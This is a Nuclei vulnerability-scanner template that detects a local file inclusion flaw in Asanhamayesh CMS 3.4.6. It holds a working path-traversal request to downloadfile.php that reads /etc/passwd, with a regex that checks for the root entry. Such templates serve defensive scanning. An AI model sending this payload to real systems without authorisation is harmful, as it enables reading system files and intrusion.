nuclei-templates/vulnerabilities/other/asanhamayesh-lfi.yaml

33 lines
758 B
YAML

id: asanhamayesh-lfi
info:
name: Asanhamayesh CMS 3.4.6 - Local File Inclusion
author: 0x_Akoko
severity: high
description: Asanhamayesh CMS 3.4.6 is vulnerable to local file inclusion.
reference:
- https://cxsecurity.com/issue/WLB-2018030006
- https://asanhamayesh.com
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
cwe-id: CWE-22
tags: asanhamayesh,lfi,traversal
requests:
- method: GET
path:
- "{{BaseURL}}/downloadfile.php?file=../../../../../../../../../../etc/passwd"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:[x*]:0:0"
- type: status
status:
- 200
# Enhanced by mp on 2022/07/22